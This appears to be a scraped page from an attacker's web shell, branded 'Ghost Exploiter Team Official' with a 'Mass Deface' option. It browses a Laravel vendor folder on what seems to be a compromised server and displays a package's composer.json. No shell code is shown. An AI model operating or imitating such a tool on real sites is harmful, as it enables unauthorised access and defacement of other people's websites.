Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
spatie
/
laravel-schemaless-attributes
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
src
--
ren
CHANGELOG.md
3.45KB
edt
ren
LICENSE.md
1.064KB
edt
ren
README.md
9.052KB
edt
ren
composer.json
1.873KB
edt
ren
{ "name": "spatie/laravel-schemaless-attributes", "description": "Add schemaless attributes to Eloquent models", "keywords": [ "spatie", "laravel-schemaless-attributes" ], "homepage": "https://github.com/spatie/laravel-schemaless-attributes", "license": "MIT", "authors": [ { "name": "Freek Van der Herten", "email": "freek@spatie.be", "homepage": "https://spatie.be", "role": "Developer" } ], "require": { "php": "^8.0", "illuminate/contracts": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0", "illuminate/database": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0", "illuminate/support": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0", "spatie/laravel-package-tools": "^1.4.3" }, "require-dev": { "brianium/paratest": "^6.2|^7.4", "mockery/mockery": "^1.4", "nunomaduro/collision": "^5.3|^6.0|^8.0", "orchestra/testbench": "^6.15|^7.0|^8.0|^9.0|^10.0", "pestphp/pest-plugin-laravel": "^1.3|^2.1|^3.1", "phpunit/phpunit": "^9.6|^10.5|^11.5|^12.0" }, "autoload": { "psr-4": { "Spatie\\SchemalessAttributes\\": "src" } }, "autoload-dev": { "psr-4": { "Spatie\\SchemalessAttributes\\Tests\\": "tests" } }, "scripts": { "test": "./vendor/bin/pest", "test-coverage": "vendor/bin/pest --coverage-html coverage", "format": "vendor/bin/php-cs-fixer fix --allow-risky=yes" }, "config": { "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true } }, "extra": { "laravel": { "providers": [ "Spatie\\SchemalessAttributes\\SchemalessAttributesServiceProvider" ] } }, "minimum-stability": "dev", "prefer-stable": true }
<=Back
Liking